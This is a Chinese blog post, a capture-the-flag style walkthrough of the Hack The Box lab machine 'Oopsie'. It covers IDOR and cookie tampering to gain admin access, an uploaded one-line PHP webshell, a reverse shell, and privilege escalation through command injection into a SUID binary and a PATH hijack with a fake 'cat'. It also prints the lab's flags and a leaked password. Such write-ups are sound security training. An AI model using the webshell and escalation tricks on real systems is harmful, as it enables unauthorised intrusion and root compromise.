<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="keywords" content="Hexo Theme Keep">
    <meta name="description" content="Hexo Theme Keep">
    <meta name="author" content="n3ym4r">
    
    <title>
        
            Oopsie靶机 |
        
        n3ym4r&#39;s blog
    </title>
    
<link rel="stylesheet" href="/css/style.css">

    <link rel="shortcut icon" href="/images/logo.svg">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.9/source/fontawesome/css/fontawesome.min.css">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.9/source/fontawesome/css/regular.min.css">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.9/source/fontawesome/css/solid.min.css">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.9/source/fontawesome/css/brands.min.css">
    <script id="hexo-configurations">
    let KEEP = window.KEEP || {};
    KEEP.hexo_config = {"hostname":"example.com","root":"/","language":"zh-CN","path":"search.json"};
    KEEP.theme_config = {"toc":{"enable":true,"number":false,"expand_all":false,"init_open":true},"style":{"primary_color":"#5ed5cc","logo":"/images/logo.svg","favicon":"/images/logo.svg","avatar":"/images/logo.svg","font_size":null,"font_family":null,"left_side_width":"260px","content_max_width":"920px","hover":{"shadow":true,"scale":true},"first_screen":{"enable":true,"header_transparent":false,"background_img":"/images/bg.svg","description":"Pay attention to safety!","font_color":null,"hitokoto":{"enable":true}},"scroll":{"progress_bar":{"enable":false},"percent":{"enable":true}}},"local_search":{"enable":true,"preload":true},"code_copy":{},"code_block_tools":{"enable":true,"style":"default"},"side_tools":{},"pjax":{"enable":true},"lazyload":{"enable":false},"version":"3.4.9"};
    KEEP.language_ago = {"second":"%s 秒前","minute":"%s 分钟前","hour":"%s 小时前","day":"%s 天前","week":"%s 周前","month":"%s 个月前","year":"%s 年前"};
    KEEP.language_code_block = {"copy":"复制代码","copied":"已复制","fold":"折叠代码块","folded":"已折叠"};
  </script>
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
<div class="progress-bar-container">
    

    
        <span class="pjax-progress-bar"></span>
        <i class="pjax-progress-icon fas fa-circle-notch fa-spin"></i>
    
</div>


<main class="page-container">

    

    <div class="page-main-content">

        <div class="page-main-content-top">
            
<header class="header-wrapper">

    <div class="header-content">
        <div class="left">
            
                <a class="logo-image" href="/">
                    <img src="/images/logo.svg">
                </a>
            
            <a class="logo-title" href="/">
               n3ym4r&#39;s blog
            </a>
        </div>

        <div class="right">
            <div class="pc">
                <ul class="menu-list">
                    
                        <li class="menu-item">
                            <a class=""
                               href="/"
                            >
                                首页
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/archives"
                            >
                                归档
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/tags"
                            >
                                标签
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/links"
                            >
                                友链
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/about"
                            >
                                关于
                            </a>
                        </li>
                    
                    
                        <li class="menu-item search search-popup-trigger">
                            <i class="fas fa-search"></i>
                        </li>
                    
                </ul>
            </div>
            <div class="mobile">
                
                    <div class="icon-item search search-popup-trigger"><i class="fas fa-search"></i></div>
                
                <div class="icon-item menu-bar">
                    <div class="menu-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <div class="header-drawer">
        <ul class="drawer-menu-list">
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/">首页</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/archives">归档</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/tags">标签</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/links">友链</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/about">关于</a>
                </li>
            
        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="page-main-content-middle">

            <div class="main-content">

                
                    <div class="fade-in-down-animation">
    <div class="article-content-container">

        <div class="article-title">
            <span class="title-hover-animation">Oopsie靶机</span>
        </div>

        
            <div class="article-header">
                <div class="avatar">
                    <img src="/images/logo.svg">
                </div>
                <div class="info">
                    <div class="author">
                        <span class="name">n3ym4r</span>
                        
                    </div>
                    <div class="meta-info">
                        
<div class="article-meta-info">
    <span class="article-date article-meta-item">
        
            <i class="fa-regular fa-calendar-plus"></i>&nbsp;
        
        <span class="pc">2023-02-06 16:47:14</span>
        <span class="mobile">2023-02-06 16:47</span>
    </span>
    
        <span class="article-update-date article-meta-item">
        <i class="fas fa-file-pen"></i>&nbsp;
        <span class="pc">2023-02-06 16:47:44</span>
    </span>
    
    
    
        <span class="article-tags article-meta-item">
            <i class="fas fa-tags"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/tags/%E6%89%93%E9%9D%B6/">打靶</a>&nbsp;
                    </li>
                
                    <li>
                        | <a href="/tags/HTB/">HTB</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    

    
    
        <span class="article-wordcount article-meta-item">
            <i class="fas fa-file-word"></i>&nbsp;<span>533 字</span>
        </span>
    
    
        <span class="article-min2read article-meta-item">
            <i class="fas fa-clock"></i>&nbsp;<span>2 分钟</span>
        </span>
    
    
</div>

                    </div>
                </div>
            </div>
        

        <div class="article-content markdown-body">
            <p><img src="https://cdn.staticaly.com/gh/n3ym4r/image@master/24/image.223p9hjuj4cg.webp" alt="image"></p>
<span id="more"></span>

<h2 id="nmap端口扫描"><a href="#nmap端口扫描" class="headerlink" title="nmap端口扫描"></a>nmap端口扫描</h2><p><img src="https://cdn.staticaly.com/gh/n3ym4r/image@master/24/image.3lwkbfnm7dw0.webp" alt="image"></p>
<p>开了80web端口</p>
<h2 id="访问web"><a href="#访问web" class="headerlink" title="访问web"></a>访问web</h2><p><img src="https://cdn.staticaly.com/gh/n3ym4r/image@master/24/image.6wv24vbuh8g0.webp" alt="image"></p>
<p>惯例F12查看有没有什么信息</p>
<p><img src="https://cdn.staticaly.com/gh/n3ym4r/image@master/24/image.4mr2kl9f46q0.webp" alt="image"></p>
<p>看到一个像是登录地址的url路径，访问</p>
<p><img src="https://cdn.staticaly.com/gh/n3ym4r/image@master/24/image.2mo1w6p2irc0.webp" alt="image"></p>
<p>可以使用访问者身份登录</p>
<p>点击account页面</p>
<p><img src="https://cdn.staticaly.com/gh/n3ym4r/image@master/24/image.7fltzqpml000.webp" alt="image"></p>
<h2 id="越权"><a href="#越权" class="headerlink" title="越权"></a>越权</h2><p>更改id,将id改为1时</p>
<p><img src="https://cdn.staticaly.com/gh/n3ym4r/image@master/24/image.1yoth0p72sf4.webp" alt="image"></p>
<p>回显了admin账户的accessID</p>
<p>点击uploads，发现需要superadmin用户权限</p>
<p><img src="https://cdn.staticaly.com/gh/n3ym4r/image@master/24/image.25gppdlwsluo.webp" alt="image"></p>
<p>抓包尝试伪造admin用户访问，看能不能上传文件</p>
<p><img src="https://cdn.staticaly.com/gh/n3ym4r/image@master/24/image.21px06fi925c.webp" alt="image"></p>
<p>将cookie中的user改为34322，role改为admin，访问成功，将数据包放出</p>
<p><img src="https://cdn.staticaly.com/gh/n3ym4r/image@master/24/image.100hpoqm1odc.webp" alt="image"></p>
<h2 id="上传shell"><a href="#上传shell" class="headerlink" title="上传shell"></a>上传shell</h2><p>来到文件上传页面</p>
<p>准备一个shell.php<code>&lt;?php echo shell_exec($_GET[&#39;shell&#39;]);?&gt;</code>,上传</p>
<p>注意：上传文件时，也是需要将cookie修改为admin的</p>
<p><img src="https://cdn.staticaly.com/gh/n3ym4r/image@master/24/image.467gnmw1h3i0.webp" alt="image"></p>
<p>上传成功后，访问&#x2F;uploads&#x2F;shell.php</p>
<p><img src="https://cdn.staticaly.com/gh/n3ym4r/image@master/24/image.1g5fguk7wjfk.webp" alt="image"></p>
<p>执行成功</p>
<p>重新上传反弹shell的PHP代码</p>
<p>webshell在&#x2F;usr&#x2F;share&#x2F;webshells&#x2F;文件夹下</p>
<p><img src="https://cdn.staticaly.com/gh/n3ym4r/image@master/24/image.a41d5buh9cw.webp" alt="image"></p>
<p>复制进bp，上传</p>
<p><img src="https://cdn.staticaly.com/gh/n3ym4r/image@master/24/image.6zzlqcucdmo0.webp" alt="image"></p>
<p>ip端口改为自己ip和nc监听的端口</p>
<p><img src="https://cdn.staticaly.com/gh/n3ym4r/image@master/24/image.6yfrvusvi9s0.webp" alt="image"></p>
<p><img src="https://cdn.staticaly.com/gh/n3ym4r/image@master/24/image.7ar98d5p75g0.webp" alt="image"></p>
<p>找到user.txt拿到flag：f2c74ee8db7983851ab2a96a44eb7981</p>
<p><img src="https://cdn.staticaly.com/gh/n3ym4r/image@master/24/image.8fs0853onww.webp" alt="image"></p>
<p>在db.php中看到robert用户密码M3g4C0rpUs3r!  </p>
<h2 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h2><p>用 <code>ls -lh $(find / -perm -u=s -type f 2&gt;/dev/null)</code> 查看具有 SUID 的可执行文件</p>
<p><img src="https://cdn.staticaly.com/gh/n3ym4r/image@master/24/image.73y6gp0eazk0.webp" alt="image"></p>
<p>执行 <code>bugtracker</code>，提示用户输入 <code>Provide Bug ID</code>，随意输入</p>
<p><img src="https://cdn.staticaly.com/gh/n3ym4r/image@master/24/image.3cfhgncgu5m0.webp" alt="image"></p>
<p>发现程序调用了cat，这个cat是root目录下的文件，有setuid权限，setuid是指赋予一个进程他所有者的权限，任意存取该文件的所有者能使用的全部系统资源。<br>&#x2F;&#x2F;就是说你只要有权执行这个可执行文件，而这个文件里调用了只有root系统命令，那么执行的时候这个进程就相当于root</p>
<p>这里我们就可以直接执行,在输入 <code>Provide Bug ID</code>时后面跟上;bin&#x2F;bash</p>
<p><img src="https://cdn.staticaly.com/gh/n3ym4r/image@master/24/image.5mwyneq44kw0.webp" alt="image"></p>
<p>得到root权限下的shell</p>
<p><img src="https://cdn.staticaly.com/gh/n3ym4r/image@master/24/image.36kyvuxs9ue0.webp" alt="image"></p>
<p>得到rootflag：af13b0bee69f8a877c3faf667f7beacf</p>
<pre><code> //这里也可以采用另一种方法提权，程序调用了cat,我们可以自写一个cat，让程序调用我们自写的cat

export PATH=/tmp:$PATH //将/tmp目录设置为环境变量
cd /tmp/ //切换到/tmp目录下
echo ‘/bin/sh’ &gt; cat //在此构造恶意的cat命令
chmod +x cat  //设置优先级，会默认会执行我们创建的cat命令
</code></pre>

        </div>

        
            <div class="post-copyright-info">
                <div class="article-copyright-info-container">
    <ul class="copyright-info-content">
        <li>本文标题：Oopsie靶机</li>
        <li>本文作者：n3ym4r</li>
        <li>创建时间：2023-02-06 16:47:14</li>
        <li>
            本文链接：https://n3ym4r.github.io/2023/02/06/Oopsie靶机/
        </li>
        <li>
            版权声明：本博客所有文章除特别声明外，均采用 <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh">BY-NC-SA</a> 许可协议。转载请注明出处！
        </li>
    </ul>
</div>

            </div>
        

        
            <ul class="post-tags-box">
                
                    <li class="tag-item">
                        <a href="/tags/%E6%89%93%E9%9D%B6/">#打靶</a>&nbsp;
                    </li>
                
                    <li class="tag-item">
                        <a href="/tags/HTB/">#HTB</a>&nbsp;
                    </li>
                
            </ul>
        

        
            <div class="article-nav">
                
                
                    <div class="article-next">
                        <a class="next"
                           rel="next"
                           href="/2023/02/05/Photobomb%E9%9D%B6%E6%9C%BA/"
                        >
                            <span class="title flex-center">
                                <span class="post-nav-title-item">Photobomb靶机</span>
                                <span class="post-nav-item">下一篇</span>
                            </span>
                            <span class="right arrow-icon flex-center">
                              <i class="fas fa-chevron-right"></i>
                            </span>
                        </a>
                    </div>
                
            </div>
        

        
    </div>
</div>


                
            </div>

        </div>

        <div class="page-main-content-bottom">
            
<footer class="footer">
    <div class="info-container">
        <div class="copyright-info info-item">
            &copy;
            
                <span>2020</span> -
            
            2023
            
                &nbsp;<i class="fas fa-heart icon-animate"></i>
                &nbsp;<a href="/">n3ym4r</a>
            
        </div>
        
        <div class="theme-info info-item">
            由 <a target="_blank" href="https://hexo.io">Hexo</a> 驱动&nbsp;|&nbsp;主题
            &nbsp;
            <a class="theme-version" target="_blank" href="https://github.com/XPoet/hexo-theme-keep">Keep v3.4.9</a>
        </div>
        
        
    </div>
</footer>

        </div>
    </div>

    
        <div class="post-tools">
            <div class="post-tools-container">
    <ul class="tools-list">
        <!-- TOC aside toggle -->
        
            <li class="tools-item page-aside-toggle">
                <i class="fas fa-outdent"></i>
            </li>
        

        <!-- go comment -->
        
    </ul>
</div>

        </div>
    

    <div class="right-bottom-side-tools">
        <div class="side-tools-container">
    <ul class="side-tools-list">
        <li class="tools-item tool-font-adjust-plus flex-center">
            <i class="fas fa-search-plus"></i>
        </li>

        <li class="tools-item tool-font-adjust-minus flex-center">
            <i class="fas fa-search-minus"></i>
        </li>

        <li class="tools-item tool-expand-width flex-center">
            <i class="fas fa-up-right-and-down-left-from-center"></i>
        </li>

        <li class="tools-item tool-dark-light-toggle flex-center">
            <i class="fas fa-moon"></i>
        </li>

        <!-- rss -->
        

        

        <li class="tools-item tool-scroll-to-bottom flex-center">
            <i class="fas fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="exposed-tools-list">
        <li class="tools-item tool-toggle-show flex-center">
            <i class="fas fa-cog fa-spin"></i>
        </li>
        
            <li class="tools-item tool-scroll-to-top flex-center">
                <i class="arrow-up fas fa-arrow-up"></i>
                <span class="percent"></span>
            </li>
        
    </ul>
</div>

    </div>

    
        <aside class="page-aside">
            <div class="post-toc-wrap">
    <div class="post-toc">
        <ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#nmap%E7%AB%AF%E5%8F%A3%E6%89%AB%E6%8F%8F"><span class="nav-text">nmap端口扫描</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%AE%BF%E9%97%AEweb"><span class="nav-text">访问web</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%B6%8A%E6%9D%83"><span class="nav-text">越权</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%B8%8A%E4%BC%A0shell"><span class="nav-text">上传shell</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%8F%90%E6%9D%83"><span class="nav-text">提权</span></a></li></ol>
    </div>
</div>
        </aside>
    

    <div class="zoom-in-image-mask">
    <img class="zoom-in-image">
</div>


    
        <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
          <span class="search-input-field-pre">
            <i class="fas fa-keyboard"></i>
          </span>
            <div class="search-input-container">
                <input autocomplete="off"
                       autocorrect="off"
                       autocapitalize="off"
                       placeholder="搜索..."
                       spellcheck="false"
                       type="search"
                       class="search-input"
                >
            </div>
            <span class="close-popup-btn">
                <i class="fas fa-times"></i>
            </span>
        </div>
        <div id="search-result">
            <div id="no-result">
                <i class="fas fa-spinner fa-pulse fa-5x fa-fw"></i>
            </div>
        </div>
    </div>
</div>

    

</main>



<script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.9/source/js/utils.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.9/source/js/main.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.9/source/js/header-shrink.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.9/source/js/back2top.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.9/source/js/dark-light-toggle.js"></script>




    <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.9/source/js/local-search.js"></script>



    <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.9/source/js/code-block-tools.js"></script>




<div class="post-scripts pjax">
    
        <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.9/source/js/left-side-toggle.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.9/source/js/libs/anime.min.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.9/source/js/toc.js"></script>
    
</div>


    <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.9/source/js/libs/pjax.min.js"></script>
<script>
    window.addEventListener('DOMContentLoaded', () => {
        window.pjax = new Pjax({
            selectors: [
                'head title',
                '.page-container',
                '.pjax'
            ],
            history: true,
            debug: false,
            cacheBust: false,
            timeout: 0,
            analytics: false,
            currentUrlFullReload: false,
            scrollRestoration: false,
            // scrollTo: true,
        });

        document.addEventListener('pjax:send', () => {
            KEEP.utils.pjaxProgressBarStart();
        });

        document.addEventListener('pjax:complete', () => {
            KEEP.utils.pjaxProgressBarEnd();
            window.pjax.executeScripts(document.querySelectorAll('script[data-pjax], .pjax script'));
            KEEP.refresh();
        });
    });
</script>



</body>
</html>
